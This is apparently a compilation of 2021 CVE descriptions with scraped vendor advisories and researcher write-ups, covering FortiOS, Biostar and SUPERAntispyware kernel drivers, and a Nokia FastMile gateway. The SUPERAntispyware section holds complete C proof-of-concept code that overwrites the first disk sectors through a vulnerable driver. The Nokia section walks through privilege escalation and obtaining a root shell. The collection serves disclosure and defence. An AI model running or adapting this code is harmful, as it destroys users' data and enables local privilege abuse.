A download of code without integrity check vulnerability in the "execute restore src-vis" command of FortiOS before 7.0.3 may allow a local authenticated attacker to download arbitrary files on the device via specially crafted update packages.

**![](https://fortiguard.com/static/images/icons/psirt.svg?v=5073) PSIRT Advisories**

**FortiOS - Removal of \`restore src-vis\` command.**

**Summary**

A download of code without integrity check vulnerability \[CWE-494\] in the "execute restore src-vis" command of FortiOS may allow a local authenticated attacker to download arbitrary files on the device via specially crafted update packages.

**Exploitation Status:**

Fortinet is aware of an instance where this vulnerability was abused and recommends immediately validating your systems for indicators of compromise:

*   Unexpected files on the FortiGate Device (list files with \`fnsysctl ls\`)
    *   /data2/virc.dat
    *   /data2/vire
    *   /data2/vire.tar.gz
    *   /data2/vire.tar
    *   /data2/vird
    *   /data2/gettd
    *   /data2/smartctll
    *   /data2/ftar
    *   /data2/reportnd
    *   /data2/llpdtd
    *   /data2/flcfgt
    *   /data2/viree/vire/inject
    *   /data2/viree/vire/insmod
    *   /data2/viree/vire/hack.o
    *   /data2/viree/vire/libips.so
    *   /bin/lldptd
    *   /data/lib/libipsx.so
    *   /data2/viree/vire/ld.so.preload
    *   /etc/ld.so.preload
*   Unexpected processes running on the FortiGate device
    *   The following unexpected processes were found to be running on the device when running \`fnsysctl ps\`:
        *   30892 0 0 S ash -c /bin/flcfgt>/data2/44.txt 2>&1
        *   30068 0 0:00 {smartctl} ash -c /data2/smartctl ps>/data2/17.txt 2>
*   Unexpected traffic sourced from the FortiGate device
    *   Traffic has been observed to the following C&C servers on port 7443 (Plaintext HTTP):
        *   192.46.213.244
        *   172.105.181.67

**Affected Products**

FortiOS versions 6.0.13 and below,  
FortiOS versions 6.2.9 and below,  
FortiOS versions 6.4.7 and below,  
FortiOS versions 7.0.2 and below.

**Solutions**

Upgrade to FortiOS 6.0.14 or above,  
Upgrade to FortiOS 6.2.10 or above,  
Upgrade to FortiOS 6.4.8 or above,  
Upgrade to FortiOS 7.0.3 or above.

CVE-2021-44168: Fortiguard

A BIOS bug in firmware for a particular PC model leaves the Platform authorization value empty. This can be used to permanently brick the TPM in multiple ways, as well as to non-permanently DoS the system.

**Related documentation**

*   Creating an account

You are not authorized to access bug #3499. To see this bug, you must first log in to an account with the appropriate permissions.

Please press **Back** and try again.

CVE-2021-38576: Bug Access Denied

Possible memory corruption in BT controller when it receives an oversized LMP packet over 2-DH1 link and leads to denial of service in BlueCore

CVE-2021-35093: December 2021 Security Bulletin | Qualcomm

An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000.

**CVE-2021-44852 – Biostar RACING GT Evo**

The Biostar RGB Peripheral Configuration utility, RACING GT Evo v2.1.1905.1700 deploys a driver whose device is created with an insufficient DACL. The driver in question, “BS\_RCIO64.sys” contains three vulnerable functions:

*   Arbitrary read of physical memory via MmMapIoSpace
    *   IOCTL : 0x226040
    *   Description: A low-integrity process may leverage the device to read arbitrary physical memory. This may aid in privilege escalation or code execution.
*   Arbitrary write of physical memory via MmMapIoSpace
    *   IOCTL : 0x226044
    *   Description: A low-integrity process may leverage the device to write arbitrary physical memory. This may aid in privilege escalation or code execution.
*   Arbitrary code execution
    *   IOCTL : 0x226000
    *   Description: A low-integrity process may leverage the device to call an arbitrary address, leading to code execution which may result in privilege escalation.

File information:

*   BS\_RCIO64.sys
    *   SHA256 – D205286BFFDF09BC033C09E95C519C1C267B40C2EE8BAB703C6A2D86741CCD3E
    *   File Version (self-reported): 10.0.0.0
    *   Product Version (self-reported): 10.0.1901.1100
    *   Device Symlink: \\\\.\\BS\_RCIO
*   RACING GT Evo
    *   Product Version: 2.1.1905.1700
        *   Source: hxxps://www.biostar\[.\]com\[.\]tw/event/RAZER/2.1.1905.1700.rar

Demonstrating opening device as a low integrity user by leveraging OSR’s FileTest application:

![](https://nephosec.com/wp-content/uploads/2021/12/1.png "1")

The following screenshot demonstrates the ioctl dispatch routine invoking the vulnerable routines (noted by EOL comments with the corresponding IOCTL codes):

![](https://nephosec.com/wp-content/uploads/2021/12/2.png "2")

Arbitrary Physical Read Routine:

![](https://nephosec.com/wp-content/uploads/2021/12/3.png "3")

Arbitrary Physical Write Routine:

![](https://nephosec.com/wp-content/uploads/2021/12/4.png "4")

Arbitrary Execution Routine:

![](https://nephosec.com/wp-content/uploads/2021/12/5.png "5")

The first QWORD in the associated input buffer is cast to a function pointer receiving three arguments, and then calls the user-controlled pointer. The following screenshot shows arbitrary code execution by setting the first QWORD in the input buffer to 0x4141414141411441:

![](https://nephosec.com/wp-content/uploads/2021/12/6.png "6")

Side-by-side view showing disassembly and decompilation of the target vulnerable function:

![](https://nephosec.com/wp-content/uploads/2021/12/7.png "7")

Bugcheck output in Windbg Preview:

1: kd> g
KDTARGET: Refreshing KD connection

\*\*\* Fatal System Error: 0x0000003b
                       (0x00000000C0000005,0xFFFFF800766311CA,0xFFFF9402CC6C9C80,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

For analysis of this file, run !analyze -v
nt!DbgBreakPointWithStatus:
fffff800\`7a61dbf0 cc              int     3
1: kd> !analyze -v
\*\*\* Unable to resolve unqualified symbol in Bp expression 'BS\_RCIO64+0x10CD'.
Connected to Windows 10 22000 x64 target at (Tue Dec  7 13:24:37.265 2021 (UTC - 5:00)), ptr64 TRUE
\*\*\* Unable to resolve unqualified symbol in Bp expression 'BS\_RCIO64+0x10CD'.
Loading Kernel Symbols
...............................................................
................................................................
................................................................
.
Loading User Symbols
.....
Loading unloaded module list
.........

\*\*\*\*\*\*\*\*\*\*\*\*\* Symbol Loading Error Summary \*\*\*\*\*\*\*\*\*\*\*\*\*\*
Module name            Error
SharedUserData         No error - symbol load deferred

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and 
repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*
\*                                                                             \*
\*                        Bugcheck Analysis                                    \*
\*                                                                             \*
\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

SYSTEM\_SERVICE\_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the BugCheck
Arg2: fffff800766311ca, Address of the instruction which caused the BugCheck
Arg3: ffff9402cc6c9c80, Address of the context record for the exception that caused the BugCheck
Arg4: 0000000000000000, zero.

Debugging Details:
\------------------

\*\*\* WARNING: Unable to verify checksum for BiostarDriverExploit.exe

KEY\_VALUES\_STRING: 1

    Key  : Analysis.CPU.mSec
    Value: 4312

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 45866

    Key  : Analysis.Init.CPU.mSec
    Value: 1265

    Key  : Analysis.Init.Elapsed.mSec
    Value: 108666

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 112

    Key  : WER.OS.Branch
    Value: co\_release

    Key  : WER.OS.Timestamp
    Value: 2021-06-04T16:28:00Z

    Key  : WER.OS.Version
    Value: 10.0.22000.1

BUGCHECK\_CODE:  3b

BUGCHECK\_P1: c0000005

BUGCHECK\_P2: fffff800766311ca

BUGCHECK\_P3: ffff9402cc6c9c80

BUGCHECK\_P4: 0

CONTEXT:  ffff9402cc6c9c80 -- (.cxr 0xffff9402cc6c9c80)
rax=ffff840f53efb340 rbx=0000000000000002 rcx=00000000002260c4
rdx=ffff840f535f8230 rsi=0000000000000000 rdi=0000000000000000
rip=fffff800766311ca rsp=ffff9402cc6ca6a0 rbp=0000000000000000
 r8=0000000000000110  r9=ffff9402cc6ca730 r10=0000fffff8007663
r11=ffff9ffeeae00000 r12=0000000000000000 r13=ffff840f535f8230
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050202
BS\_RCIO64+0x11ca:
fffff800\`766311ca ff10            call    qword ptr \[rax\] ds:002b:ffff840f\`53efb340=4141414141414141
Resetting default scope

PROCESS\_NAME:  BiostarDriverExploit.exe

STACK\_TEXT:  
ffff9402\`cc6ca6a0 fffff800\`7a44d501     : ffff840f\`548d97c0 ffff840f\`535f8230 00000000\`00040282 fffff800\`00000000 : BS\_RCIO64+0x11ca
ffff9402\`cc6ca760 fffff800\`76632d58     : ffff840f\`535f8230 ffff9402\`cc6ca871 00000000\`00000002 00000000\`00000001 : nt!IoStartPacket+0x91
ffff9402\`cc6ca7a0 fffff800\`7a502f65     : 840f5645\`42536f49 f177d485\`c891927c 00000000\`00000000 00000000\`00000110 : BS\_RCIO64+0x2d58
ffff9402\`cc6ca7d0 fffff800\`7a96b532     : 00000000\`00000001 ffff840f\`535f8230 ffff9402\`cc6ca871 fffff800\`00000000 : nt!IofCallDriver+0x55
ffff9402\`cc6ca810 fffff800\`7a96acbf     : ffff840f\`535f8230 ffff9402\`cc6cab60 00000000\`00226005 00000000\`00226000 : nt!IopSynchronousServiceTail+0x1d2
ffff9402\`cc6ca8c0 fffff800\`7a96a6c6     : 00007ff6\`be416480 00000000\`00000000 00000000\`00000000 00000000\`00000000 : nt!IopXxxControlFile+0x5df
ffff9402\`cc6caa00 fffff800\`7a627b78     : 00000000\`00000000 00000000\`00000000 00000000\`00000000 00000000\`00000000 : nt!NtDeviceIoControlFile+0x56
ffff9402\`cc6caa70 00007ffb\`68783444     : 00007ffb\`66053edb 00007ff6\`00002282 00007ff6\`be3b04f3 00007ff6\`be489100 : nt!KiSystemServiceCopyEnd+0x28
000000a9\`6ceff3d8 00007ffb\`66053edb     : 00007ff6\`00002282 00007ff6\`be3b04f3 00007ff6\`be489100 00007ff6\`be3b04f3 : ntdll!NtDeviceIoControlFile+0x14
000000a9\`6ceff3e0 00007ffb\`66c35f91     : 00000000\`00226000 00007ff6\`be40cd97 000000a9\`6ceff4c8 00007ff6\`be3c469d : KERNELBASE!DeviceIoControl+0x6b
000000a9\`6ceff450 00007ff6\`be38a946     : 00000000\`00000000 cccccccc\`cccccccc 000000a9\`6ceff4e0 00000000\`00000000 : KERNEL32!DeviceIoControlImplementation+0x81
000000a9\`6ceff4a0 00000000\`00000000     : cccccccc\`cccccccc 000000a9\`6ceff4e0 00000000\`00000000 00000000\`00000000 : BiostarDriverExploit!ExecuteFunction+0xd6 
\[C:\\Users\\Michael\\source\\repos\\BiostarDriverExploit\\BiostarDriverExploit\\Biostar.cpp @ 90\] 

SYMBOL\_NAME:  BS\_RCIO64+11ca

MODULE\_NAME: BS\_RCIO64

IMAGE\_NAME:  BS\_RCIO64.sys

STACK\_COMMAND:  .cxr 0xffff9402cc6c9c80 ; kb

BUCKET\_ID\_FUNC\_OFFSET:  11ca

FAILURE\_BUCKET\_ID:  0x3B\_c0000005\_BS\_RCIO64!unknown\_function

OS\_VERSION:  10.0.22000.1

BUILDLAB\_STR:  co\_release

OSPLATFORM\_TYPE:  x64

OSNAME:  Windows 10

FAILURE\_ID\_HASH:  {ba69bbee-70a0-25f2-73c1-6621f523085b}

Followup:     MachineOwner
\---------

1: kd> k
 # Child-SP          RetAddr               Call Site
00 ffff9402\`cc6c8b28 fffff800\`7a762af2     nt!DbgBreakPointWithStatus
01 ffff9402\`cc6c8b30 fffff800\`7a762331     nt!KiBugCheckDebugBreak+0x12
02 ffff9402\`cc6c8b90 fffff800\`7a615697     nt!KeBugCheck2+0xa71
03 ffff9402\`cc6c9300 fffff800\`7a6281a9     nt!KeBugCheckEx+0x107
04 ffff9402\`cc6c9340 fffff800\`7a6275bc     nt!KiBugCheckDispatch+0x69
05 ffff9402\`cc6c9480 fffff800\`7a61ed32     nt!KiSystemServiceHandler+0x7c
06 ffff9402\`cc6c94c0 fffff800\`7a486347     nt!RtlpExecuteHandlerForException+0x12
07 ffff9402\`cc6c94f0 fffff800\`7a48a291     nt!RtlDispatchException+0x2d7
08 ffff9402\`cc6c9c50 fffff800\`7a6282ce     nt!KiDispatchException+0x1b1
09 ffff9402\`cc6ca330 fffff800\`7a623e8f     nt!KiExceptionDispatch+0x10e
0a ffff9402\`cc6ca510 fffff800\`766311ca     nt!KiGeneralProtectionFault+0x30f
0b ffff9402\`cc6ca6a0 fffff800\`7a44d501     BS\_RCIO64+0x11ca
0c ffff9402\`cc6ca760 fffff800\`76632d58     nt!IoStartPacket+0x91
0d ffff9402\`cc6ca7a0 fffff800\`7a502f65     BS\_RCIO64+0x2d58
0e ffff9402\`cc6ca7d0 fffff800\`7a96b532     nt!IofCallDriver+0x55
0f ffff9402\`cc6ca810 fffff800\`7a96acbf     nt!IopSynchronousServiceTail+0x1d2
10 ffff9402\`cc6ca8c0 fffff800\`7a96a6c6     nt!IopXxxControlFile+0x5df
11 ffff9402\`cc6caa00 fffff800\`7a627b78     nt!NtDeviceIoControlFile+0x56
12 ffff9402\`cc6caa70 00007ffb\`68783444     nt!KiSystemServiceCopyEnd+0x28
13 000000a9\`6ceff3d8 00007ffb\`66053edb     ntdll!NtDeviceIoControlFile+0x14
14 000000a9\`6ceff3e0 00007ffb\`66c35f91     KERNELBASE!DeviceIoControl+0x6b
15 000000a9\`6ceff450 00007ff6\`be38a946     KERNEL32!DeviceIoControlImplementation+0x81
16 000000a9\`6ceff4a0 00000000\`00000000     BiostarDriverExploit!ExecuteFunction+0xd6 
\[C:\\Users\\Michael\\source\\repos\\BiostarDriverExploit\\BiostarDriverExploit\\Biostar.cpp @ 90\] 
1: kd> r
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=0000000000000000 rdi=0000000000000000
rip=fffff8007a61dbf0 rsp=ffff9402cc6c8b28 rbp=ffff9402cc6c8c90
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000010
r11=0000000000000000 r12=0000000000000003 r13=fffff8007a200000
r14=ffff9402cc6c9c01 r15=fffff8007a762bb0
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040286
nt!DbgBreakPointWithStatus:
fffff800\`7a61dbf0 cc              int     3

BSOD – bugcheck after RIP set to 0x4141414141414141:

![](https://nephosec.com/wp-content/uploads/2021/12/8.png "8")

🙁

CVE-2021-44852: Biostar Exploit – NephōSec

SUPERAntispyware v8.0.0.1050 was discovered to contain an issue in the component saskutil64.sys. This issue allows attackers to arbitrarily write data to the device via IOCTL 0x9C402140.

SUPERAntispyware backdoor

This is saskutil64.sys 1.0.0.1016 driver of SUPERAntispyware 8.0.0.1050 (current), both Free/Pro editions.

The SaskCallDriver function work with fixed size buffer send from user mode.

This buffer is a structure defined as

#pragma pack(push, 1)

typedef struct \_CALL\_DRV {

WCHAR DeviceName\[2048\]; //e.g. \\Device\\Harddisk0\\DR0

LARGE\_INTEGER StartingOffset;

SIZE\_T DataSize;

PVOID DataPtr; //pointer to user mode allocated buffer of DataSize length.

} CALL\_DRV, \* PCALL\_DRV;

#pragma pack(pop)

Purpose of this function is to build synchronous I/O request for given device and send data to it (IRP\_MJ\_WRITE).

This function is totally bugged as it skips all critical API result checks.

For example any wrong device name will lead to bugcheck because code does not validate IoGetDeviceObjectPointer or

IoBuildSynchronousFsdRequest calls.

Additionally it is backdoor as such functionality should not be available for user mode applications directly.

The SASKUTIL driver device has default security descriptor and can be used by any local user.

This feature maybe used for various kind of things, including data wipe or sending udp/tcp packets.

NTSTATUS SaskCallDriver(PVOID Unreferenced, PIRP Irp)

{

CALL\_DRV\* CallDrvStruct;

PVOID writeBuffer;

IRP \*writeIrp;

UNICODE\_STRING deviceString;

IO\_STATUS\_BLOCK statusBlock;

KEVENT waitEvent;

PDEVICE\_OBJECT deviceObject;

LARGE\_INTEGER startingOffset;

PFILE\_OBJECT fileObject;

CallDrvStruct = (CALL\_DRV\*)Irp->AssociatedIrp.SystemBuffer;

\_\_try {

if ((ULONG\_PTR)CallDrvStruct < 0x8000000000000000)

{

ProbeForRead(CallDrvStruct, 4120, 1);

ProbeForWrite(CallDrvStruct, 4120, 1);

}

}

\_\_except (EXCEPTION\_EXECUTE\_HANDLER) {

return STATUS\_ACCESS\_VIOLATION;

}

\_\_try {

writeBuffer = CallDrvStruct->DataPtr;

if ((ULONG\_PTR)writeBuffer < 0x8000000000000000)

{

ProbeForRead(writeBuffer, CallDrvStruct->DataSize, 1);

ProbeForWrite(CallDrvStruct->DataPtr, CallDrvStruct->DataSize, 1);

}

}

\_\_except (EXCEPTION\_EXECUTE\_HANDLER) {

return STATUS\_ACCESS\_VIOLATION;

}

RtlInitUnicodeString(&deviceString, CallDrvStruct->DeviceName);

IoGetDeviceObjectPointer(&deviceString, FILE\_READ\_ATTRIBUTES, &fileObject, &deviceObject); // No check of API call

startingOffset = CallDrvStruct->StartingOffset;

KeInitializeEvent(&waitEvent, NotificationEvent, FALSE);

writeIrp = IoBuildSynchronousFsdRequest( // No check of API call

IRP\_MJ\_WRITE,

deviceObject,

CallDrvStruct->DataPtr,

CallDrvStruct->DataSize,

&startingOffset,

&waitEvent,

&statusBlock);

writeIrp->Flags = IRP\_BUFFERED\_IO;

if (IofCallDriver(deviceObject, writeIrp) == STATUS\_PENDING) // This will bugcheck if anything from above failed.

KeWaitForSingleObject(&waitEvent, Executive, KernelMode, FALSE, NULL);

return STATUS\_SUCCESS;

}

#pragma warning(disable: 4005)

#include <windows.h\>

#include <strsafe.h\>

#include <ntstatus.h\>

#include "ntos.h"

NTSTATUS CallDriver(

\_In\_ HANDLE DeviceHandle,

\_In\_ ULONG IoControlCode,

\_In\_opt\_ PVOID InputBuffer,

\_In\_opt\_ ULONG InputBufferLength,

\_In\_opt\_ PVOID OutputBuffer,

\_In\_opt\_ ULONG OutputBufferLength)

{

BOOL bResult = FALSE;

IO\_STATUS\_BLOCK ioStatus;

return NtDeviceIoControlFile(DeviceHandle,

NULL,

NULL,

NULL,

&ioStatus,

IoControlCode,

InputBuffer,

InputBufferLength,

OutputBuffer,

OutputBufferLength);

}

#pragma pack(push, 1)

typedef struct \_CALL\_DRV {

WCHAR DeviceName\[2048\];

LARGE\_INTEGER StartingOffset; // +0x1000

SIZE\_T DataSize; // +0x1008

PVOID DataPtr; // +0x1010

} CALL\_DRV, \* PCALL\_DRV;

#pragma pack(pop)

ULONG u = FIELD\_OFFSET(CALL\_DRV, DataPtr);

#define SAS\_DEVICE 0x9C40

#define IOCTL\_SAS\_CALLDRIVER CTL\_CODE(SAS\_DEVICE, 0x850, METHOD\_BUFFERED, FILE\_ANY\_ACCESS)

int main()

{

NTSTATUS ntStatus;

CALL\_DRV request;

HANDLE deviceHandle = CreateFile(TEXT("\\\\\\\\.\\\\SASKUTIL"),

GENERIC\_READ | GENERIC\_WRITE,

0,

NULL,

OPEN\_EXISTING,

0,

NULL);

if (deviceHandle == INVALID\_HANDLE\_VALUE) {

printf\_s("\[!\] Unable to open device\\r\\n");

#ifndef \_DEBUG

return -1;

#endif

}

else {

printf\_s("\[+\] SASKUTIL device opened\\r\\n");

}

system("pause");

WCHAR writeData\[512\];

memset(&writeData, 0xAB, sizeof(writeData));

RtlSecureZeroMemory(&request, sizeof(request));

wcscpy\_s(request.DeviceName, L"\\\\Device\\\\Harddisk0\\\\DR0");

request.DataSize = sizeof(writeData);

request.DataPtr = &writeData;

for (ULONG i = 0; i < 65; i++) {

request.StartingOffset.LowPart = (i \* 512);

ntStatus = CallDriver(deviceHandle,

IOCTL\_SAS\_CALLDRIVER,

&request,

sizeof(CALL\_DRV),

NULL,

0);

printf\_s("\[+\] CallDriver NTSTATUS 0x%lX\\r\\n", ntStatus);

}

CloseHandle(deviceHandle);

}

CVE-2020-22061: SUPERAntispyware backdoor

Nokia FastMile 3TG00118ABAD52 devices allow privilege escalation by an authenticated user via is_ctc_admin=1 to login_web_app.cgi and use of Import Config File.

As a part of my 5G home internet offering, Optus bundles a 5G gateway called the Nokia Fastmile. The same device seems to be shipped by T-Mobile for their 5G offering and is passionately known as the 'trashcan' in r/tmobileisp.

![](https://eddiez.me/content/images/2021/10/ResrcID22518_GW_bottom.png)

Nokia Fastmile Stock Photo

Naturally, the first thing I tried to do is to obtain root access on it.

**Finding a Privilege Escalation Bug**

EDIT: This has been assigned CVE-2021-45896.

Immediately, the first thing I noticed is that the provided userAdmin credentials printed on the bottom of the device seem to be a low level account.

Taking a peak at the requests going on when logging in immediately reveals an authenticated privilege escalation vulnerability. This likely also affects other Nokia devices. My firmware version: 3TG00118ABAD52.

When logging in, a call is made to POST /login\_web\_app.cgi.

If you intercept the response you will see that there is a variable called "is\_ctc\_admin".

![](https://eddiez.me/content/images/2021/10/image-2.png)

Change "is\_ctc\_admin" to 1

If you change this in the response to 1 you get access to additional functionality and full admin. The vulnerability is a classic access control issue where authorisation is handled only on the client side.

Now we have access to an additional tab but also more functionality in some existing tabs.

![](https://eddiez.me/content/images/2021/10/image-3.png)

SPAN Ports!

![](https://eddiez.me/content/images/2021/10/image-7.png)

QOS

![](https://eddiez.me/content/images/2021/10/image-4.png)

Backup and Restore Configuration

**Modifying the Configuration**

Doing some Googling I came across this smart guy who figured out the format of Nokia's configuration file format and wrote a tool to unpack, and pack configuration files so that you can make changes that aren't available through the web interface.

Unlocking IAM’s Nokia G-240W-A router (Part 1) · 0x41.cf

![](https://0x41.cf/favicon.png)

![](https://i.0x41.cf/b/nokia-g-240w-a.png)

The tool he wrote also works for the Nokia Fastmile: https://gist.github.com/thedroidgeek/80c379aa43b71015d71da130f85a435a

Following the write-up gets us all the way to SSH/Telnet access to the device however we are stopped by this annoying password prompt for shell access.

None of the passwords in the configuration file work for this shell password.

![](https://eddiez.me/content/images/2021/10/image-8.png)

???

Some other comments mention changing LimitAccount\_ONTUSER to false and logging in with ONTUSER:SUGAR2A041 however this doesn't seem to work for the Fastmile.

**Giving Up and Moving to Looking at Hardware**

randomsrvapps over at Whirlpool seems to have managed to get a trivial root shell via UART/ADB revealing that the device is Android based? Lets verify this.

Flipping the device over we see some ports that seem to be covered (circled in yellow on the photo).

![](https://eddiez.me/content/images/2021/11/4032-3024-resize.jpg)

These stickers can only be uncovered from the rear as the stickers they used are quite strong. By undoing circled bolts in red (Torx T15H) and removing the sim card, the feet come off and we can poke out the stickers.

This reveals a USB-C port and two RJ12 ports.

![](https://eddiez.me/content/images/2021/11/3024-4032-resize-crop.jpg)

USB-C is Top Right

**It runs Android?**

As per the thread, plugging into the USB-C port and running ADB shell gives us an immediate root shell on the device.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-13-16-50-43.png)

Interestingly it has a Snapdragon 855 in it, the same processor that was in previous generation flagships like the Google Pixel 4.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-20-22-43-15.png)

Snapdragon 855

I also confirmed that you can get this same console access by plugging into the pins outlined in the thread. These terminals are 1.8v logic level and the pins from inside to out are RX, TX, and ground with a baud rate of 115200.

![](https://eddiez.me/content/images/2021/11/3024-4033-resize-canvas.jpg)

Having a poke around via ADB shell reveals some oddities.

The most noteworthy being that the IP addressing scheme of my local network configured via the WEB-UI (172.10.0.0/24) is non-existent and some random private subnet 192.168.85.0/24 shows up.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-14-26.png)

Performing a traceroute from my local machine we see traffic get routed through this 192.168.85.0/24 subnet as well.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-24-13.png)

The First Hop Is My pfsense Firewall (I'm Running Double NAT)

This can also be verified by performing a tcpdump with a filter on the Fastmile whilst pinging 9.9.9.9.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-23-56.png)

Why is our IP address 192.168.85.6??

I immediately copied over a precompiled binary of busybox onto the Fastmile to try to run ARP.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-28-12.png)

Then the realisation came.

**It's Two Devices in One Box!**

Nokia have basically taped a 5G capable phone to one of their old Alcatel-Lucent routers and shipped it in a cylindrical box. This also explains why the configuration modification tool earlier worked flawlessly.

![](https://eddiez.me/content/images/2021/11/Nokia-Fastmile.jpg)

Having root on the Android side doesn't help at all with getting root on the router side!

Using this knowledge we can also enable remote Android debugging by first adding a firewall rule.

    iptables -I INPUT 1 -s 192.168.85.6 -j ACCEPT

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-13-22-38-34.png)

Enabling remote debugging on a port.

    adb tcpip 5555 //While connected via USB.
    

Then connecting remotely without having to be tethered to the device.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-13-22-43-12.png)

Looking back at the physical device again you can even see two different PCB types.

![](https://eddiez.me/content/images/2021/11/4032-3026-resize-annotated-2.jpg)

UART pins are also provided for the router side that are easily accessible. These pins are 3.3v logic level and the pins from inside out are ground, RX, TX with a baud rate of 115200.

![](https://eddiez.me/content/images/2021/11/4032-3027-resize.jpg)

Letting it boot whilst connected via UART drops us into the same restricted shell that we had earlier via SSH where we don't know the 'shell' password. Not helpful.

Interrupting boot drops us in CFE but I don't have the patience to dump the image over serial as that would take ~4 days. Otherwise, I'm not too familiar with CFE and am not super keen on turning my Fastmile into a $400 brick.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-14-00-39-45.png)

Changing the GPON Password Board Parameter Doesn't Do Anything

If anyone else has any advice/knowledge feel free to ping me at email, we still aren't root after all this.

**Teardown**

Out of curiosity, I took the device apart a bit more as I hadn't seen any other write-ups detailing this.

Tracing back to the step where we'd removed the bottom of the device, the next step of disassembly is to bend back the clips around the perimeter circled in red. I've also circled the UART pins in yellow for clarity.

![](https://eddiez.me/content/images/2021/11/clips_resize.jpg)

Now you can flip the device and lift up the white shell to reveal the antennas.

![](https://eddiez.me/content/images/2021/11/antenna-resized.jpg)

Every bolt from here on is a Torx T8H. Looking at the top there are 5 bolts to undo which loosen the LED indicator board.

![](https://eddiez.me/content/images/2021/11/top-resized.jpg)

With the top LED indicator board off we can see where all the antenna's terminate. If you wanted to attach an external antenna, this is where you'd do it.

![](https://eddiez.me/content/images/2021/11/antenna-resized-1.jpg)

Unfortunately, accessibility to the connectors is very limited as some snake under the heatsink. I did try removing the heatsink later but it was pretty solidly bound to the PCB so I'm not sure if it's held together with a thermal epoxy or if I missed some bolts.

Next up, looking at the side of the device with the smaller heatsink (Android side), there are two more bolts on the diagonal face to loosen.

![](https://eddiez.me/content/images/2021/11/phone-side-resized.jpg)

This allows you to lift up 2/5 sides of the antenna assembly revealing the Android device.

![](https://eddiez.me/content/images/2021/11/phone-resized.jpg)

Removing the 4 bolts that hold the Android side in allows you to lift and fold the device over like we've done with the antenna panels.

![](https://eddiez.me/content/images/2021/11/phone-flipped-resized.jpg)

This also reveals the backside of the Alcatel-Lucent router and the only electrical interconnect between the two devices in the bottom right.

![](https://eddiez.me/content/images/2021/11/router-backside-resized-3.jpg)

I didn't go any further as the router side is mostly covered up by it's heatsink and if it's anything like the Android side then it was likely to also be difficult to remove.

CVE-2021-45896: WIP: Hacking the Nokia Fastmile

An issue was discovered in the actix-web crate before 0.7.15 for Rust. It can unsoundly coerce an immutable reference into a mutable reference, leading to memory corruption.

\`\`\`toml \[advisory\] id = "RUSTSEC-2018-0019" package = "actix-web" categories = \["memory-corruption"\] date = "2018-06-08" url = "https://github.com/actix/actix-web/issues/289" \[versions\] patched = \[">= 0.7.15"\] \`\`\` # Multiple memory safety issues Affected versions contain multiple memory safety issues, such as: - Unsoundly coercing immutable references to mutable references - Unsoundly extending lifetimes of strings - Adding the \`Send\` marker trait to objects that cannot be safely sent between threads This may result in a variety of memory corruption scenarios, most likely use-after-free. A significant refactoring effort has been conducted to resolve these issues.

CVE-2018-25024

In NetBSD through 9.2, the IPv6 Flow Label generation algorithm employs a weak cryptographic PRNG.

CVE-2021-45489

An issue was discovered in the Linux kernel before 5.15.11. There is a memory leak in the __rds_conn_create() function in net/rds/connection.c in a certain combination of circumstances.

CVE-2021-45480

This issue was addressed with a new entitlement. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra, iOS 12.4, tvOS 12.4. A local user may be able to read a persistent account identifier.

Released July 22, 2019

**Bluetooth**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic (Key Negotiation of Bluetooth - KNOB)

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2019-9506: Daniele Antonioli of SUTD, Singapore, Dr. Nils Ole Tippenhauer of CISPA, Germany, and Prof. Kasper Rasmussen of University of Oxford, England

The changes for this issue mitigate CVE-2020-10135.

Entry added August 13, 2019, updated June 25, 2020

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: natashenka of Google Project Zero

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2019-8647: Samuel Groß and natashenka of Google Project Zero

**Core Data**

Available for: Apple TV 4K and Apple TV HD

